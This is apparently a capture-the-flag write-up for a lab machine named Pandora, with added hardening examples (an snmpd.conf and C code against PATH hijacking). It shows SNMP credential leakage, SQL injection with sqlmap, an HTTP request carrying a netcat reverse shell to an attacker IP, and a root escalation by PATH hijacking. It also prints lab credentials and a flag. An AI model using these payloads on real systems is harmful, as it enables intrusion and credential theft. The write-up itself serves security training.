Enum

nmap

tcp

# Nmap 7.92 scan initiated Mon Jan 10 13:15:56 2022 as: nmap -sCV -oN nmap_tcp 10.129.222.255
Nmap scan report for 10.129.222.255
Host is up (0.090s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 13:16:05 2022 -- 1 IP address (1 host up) scanned in 9.74 seconds

udp

sudo nmap -sU panda.htb      
[sudo] password for bob: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 15:46 CET
Nmap scan report for panda.htb (10.129.222.255)
Host is up (0.093s latency).
Not shown: 998 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp

SNMP

From the UDP scan we notice that SNMP is open.

We run snmp-check against the host with snmp-check 10.129.222.255:

snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.129.222.255:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.129.222.255
  Hostname                      : pandora
  Description                   : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
  Contact                       : Daniel
  Location                      : Mississippi
  Uptime snmp                   : 03:18:10.32
  Uptime system                 : 03:18:01.77
  System date                   : 2022-1-10 15:24:17.0

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 5761897
  TCP segments sent             : 7461778
  TCP segments retrans          : 74411
  Input datagrams               : 5772624
  Delivered datagrams           : 5772622
  Output datagrams              : 5026575

[...]

959                   runnable              sh                    /bin/sh               -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
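
As an added example (not part of the writeup), here is the net-snmp snmpd.conf setting that makes this enumeration possible next to a restricted configuration; the view name systemonly follows the stock Ubuntu layout, while the monitoring host address, the SNMPv3 user and both passphrases are placeholders.

```conf
# Weak: any client that knows the 'public' community can read the whole MIB,
# including HOST-RESOURCES-MIB hrSWRunTable (.1.3.6.1.2.1.25.4), which is
# where snmp-check gets the process list and its command-line arguments.
rocommunity public

# Restricted: limit the read-only view to the system group and host status
# subtrees, and accept the community only from the monitoring host
# (10.0.0.5 is a placeholder).
view  systemonly included .1.3.6.1.2.1.1
view  systemonly included .1.3.6.1.2.1.25.1
rocommunity public 10.0.0.5 -V systemonly

# Preferred: SNMPv3 with authentication and encryption instead of a shared
# community string; 'monitor' and both passphrases are placeholders.
createUser monitor SHA "REPLACE_auth_passphrase" AES "REPLACE_priv_passphrase"
rouser monitor priv -V systemonly
```

Restricting the view only hides the process table from SNMP; the host_check invocation still passes the password as a command-line argument, which any local user can read from /proc, so the secret should move out of argv as well.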

Resources

With the credentials daniel:HotelBabylon23, leaked in the process list above, we are able to log in as daniel over SSH.

We run linpeas and discover another VHOST:

lrwxrwxrwx 1 root root 31 Dec  3 12:53 /etc/apache2/sites-enabled/pandora.conf -> ../sites-available/pandora.conf
  ServerName pandora.panda.htb

If we look at the configuration:

daniel@pandora:/var/www/pandora/pandora_console$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

We notice that the vhost is bound to localhost only and, because of AssignUserID, is served as the user matt. We can confirm it is reachable locally with curl:

$ curl -H "Host: pandora.panda.htb" http://localhost                    
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">

curl -H "Host: pandora.panda.htb" http://localhost/pandora_console/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

        <title>Pandora FMS - the Flexible Monitoring System</title>

[...]

We forward this port to our machine using chisel:

$ ./chisel server -p 9000 --reverse
2022/01/11 08:59:53 server: Reverse tunnelling enabled
2022/01/11 08:59:53 server: Fingerprint XbzF4cXangJHcxENo4KP60XwiI8Ga7JipQZq8MIARwg=
2022/01/11 08:59:53 server: Listening on http://0.0.0.0:9000
2022/01/11 09:00:45 server: session#1: tun: proxy#R:8008=>80: Listening
daniel@pandora:~$ ./chisel client 10.10.17.142:9000 R:8008:127.0.0.1:80
2022/01/11 08:00:43 client: Connecting to ws://10.10.17.142:9000
2022/01/11 08:00:44 client: Connected (Latency 25.710601ms)

Once we have forwarded this to our local machine, we discover that the version running is which appears to be vulnerable

We learn from the blog post that the session_id parameter of chart_generator.php is vulnerable to SQL injection.

We use sqlmap to dump the database. Among the stored sessions we find one belonging to matt (id_usuario "matt"), and tpassword_history holds the password hashes:

sqlmap -u 'http://pandora.panda.htb:8008/pandora_console/include/chart_generator.php?session_id=1' -D pandora --tables --batch 

+----------------------------+-----------------------------------------------------+-------------+
| id_session                 | data                                                | last_active |
+----------------------------+-----------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                            | 1638783555  |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                | 1638789018  |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                | 1638792211  |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                | 1638786129  |
| 2lbnsgqr421lpekvdf99t9bplu | NULL                                                | 1641889533  |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                            | 1638540332  |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                | 1638795380  |
| 42hjaqrqjim176kd75bq29ridm | NULL                                                | 1641889101  |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                | 1638786842  |
| 4jko4f2gtkenm1o2bvk8u7lati | NULL                                                | 1641829963  |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                            | 1638535373  |
| 59qae699l0971h13qmbpqahlls | NULL                                                | 1638787305  |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                | 1638792685  |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                            | 1638281946  |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                            | 1641195617  |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                | 1623957150  |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                            | 1638446321  |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                | 1638787267  |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                            | 1638881787  |
| a2u0c3mu6n5oaco13vpfk8us20 | NULL                                                | 1641888369  |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                | 1638795315  |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                            | 1638881664  |
| bbhf4mtod74tqhv50mpdvu4lj5 | id_usuario|s:6:"daniel";                            | 1641201982  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                | 1638786277  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                            | 1641200284  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                            | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                | 1638786349  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                | 1638540345  |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                            | 1638168492  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                            | 1638456173  |
| kam34ut0caka8rnvf5ekcs0gjf | NULL                                                | 1641888742  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                | 1638787808  |
| mi1eldqb65rbs7g04ctuiean0v | NULL                                                | 1641889151  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                            | 1638540482  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                            | 1637667827  |
| os7t6ongcosddnupbddqn69cnt | NULL                                                | 1641889073  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                            | 1638168416  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                            | 1638889082  |
| rlklgt45od2js55hioav906j79 | id_usuario|s:6:"daniel";                            | 1641888708  |
| rrbdk3bi4h52aab1pa9qm5d3sd | NULL                                                | 1641888750  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                            | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                            | 1638793297  |
| vcmr926652b18b69m4ibkvosj7 | id_usuario|s:6:"daniel";                            | 1641816405  |
+----------------------------+-----------------------------------------------------+-------------+
Database: pandora
Table: tpassword_history
[2 entries]
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end            | password                         | date_begin          |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1       | matt    | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2       | daniel  | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+

Searching for vulnerabilities, we find this advisory from Core Security:

[CVE-2020-13851] It is possible to abuse the Events feature to gain arbitrary command execution on the underlying operating system. The Events function allows a user to configure and execute actions (server responses) based on specific conditions reported by the agents. For instance, it is possible to leverage the mentioned feature to execute an arbitrary operating system command as the user apache in the context of the Pandora FMS server. It should be noted that low privilege (i.e. non-administrative users) can issue the following request as well.

We adjust the POC and change the reverse shell:

POST /pandora_console/ajax.php HTTP/1.1
Host: pandora.panda.htb:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Origin: http://pandora.panda.htb:8008
Connection: close
Referer: http://pandora.panda.htb:8008//pandora_console/index.php?sec=eventos&sec2=operation/events/events
Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq

page=include/ajax/events&perform_event_response=10000000&target=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.17.142+9001+>/tmp/f&response_id=1

We get a shell as matt and retrieve the user flag:

matt@pandora:/home/matt$ cat user.txt
574bfb063cc88de86473a43158d75f49

We run linpeas and observe an interesting SUID binary:

═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
[...]
-rwsr-x--- 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

Let's investigate this binary and see what happens when we execute it:

matt@pandora:/home/matt$ file /usr/bin/pandora_backup 
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/home/matt$ ltrace /usr/bin/pandora_backup
getuid()                                         = 1000
geteuid()                                        = 1000
setreuid(1000, 1000)                             = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
)                = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
)      = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)     = 39
+++ exited (status 1) +++

We observe that the binary invokes tar by its bare name inside system() rather than by an absolute path, so the shell that system() spawns resolves tar through our PATH. Since the binary is setuid root, placing a directory we control first in PATH should let us hijack that call (PATH injection).

matt@pandora:/dev/shm$ echo /bin/sh > tar
matt@pandora:/dev/shm$ chmod +x tar
matt@pandora:/dev/shm$ export PATH=`pwd`:$PATH
matt@pandora:/dev/shm$ echo  $PATH
/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/dev/shm$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
# whoami
root
#
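
As an added example (not the pandora_backup source, which is not on this page), the C below shows both halves of this finding: first_hit_in_path walks PATH the way the shell behind system() does, dir_is_untrusted flags entries such as /dev/shm that a root-privileged program must not trust, and run_fixed_command is the launcher shape that closes the hole (absolute path, no shell, fixed environment). All three function names and the PATH string in main are my own.

```c
/* Added example, not the pandora_backup source: how a bare "tar" inside
 * system() is resolved through the caller's PATH, a check for PATH entries
 * a privileged program must not trust, and a launcher that avoids both. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Walk path_env the way /bin/sh does for an unqualified command name.
 * Returns the zero-based index of the winning entry and writes the full
 * path to out, or returns -1 (and an empty out) if nothing matched. */
int first_hit_in_path(const char *path_env, const char *cmd, char *out, size_t outlen)
{
    char *copy = strdup(path_env);
    char *save = NULL;
    int idx = 0, hit = -1;
    if (!copy) return -1;
    for (char *dir = strtok_r(copy, ":", &save); dir; dir = strtok_r(NULL, ":", &save), idx++) {
        snprintf(out, outlen, "%s/%s", dir, cmd);
        if (access(out, X_OK) == 0) { hit = idx; break; }
    }
    free(copy);
    if (hit < 0 && outlen > 0) out[0] = '\0';
    return hit;
}

/* A PATH entry is untrusted for a privileged program if it is missing (it
 * could be created later), not a directory, not owned by root, or writable
 * by group/others; /dev/shm and /tmp fail the last check. */
int dir_is_untrusted(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 1;
    if (st.st_uid != 0) return 1;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) ? 1 : 0;
}

/* Hardened replacement for system("tar ..."): argv[0] must be absolute so
 * PATH is never consulted, no shell parses the command, and the inherited
 * environment is replaced by a fixed one. Returns the child's exit status. */
int run_fixed_command(char *const argv[])
{
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    int status = 0;
    pid_t pid;
    if (!argv || !argv[0] || argv[0][0] != '/') return -1;
    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed PATH mirroring the writeup's, with /dev/shm in front. */
    const char *hijacked = "/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
    char hit[512];
    int idx = first_hit_in_path(hijacked, "tar", hit, sizeof hit);
    printf("tar resolves via PATH entry %d -> %s\n", idx, hit);
    printf("/dev/shm untrusted: %d\n", dir_is_untrusted("/dev/shm"));
    char *const argv[] = { "/bin/sh", "-c", "exit 0", NULL };
    printf("fixed launcher exit status: %d\n", run_fixed_command(argv));
    return 0;
}
```

Run it with the writeup's PATH and it reports which directory would supply tar; audit code that does the same over a setuid binary's inherited environment catches this class of bug before ltrace has to.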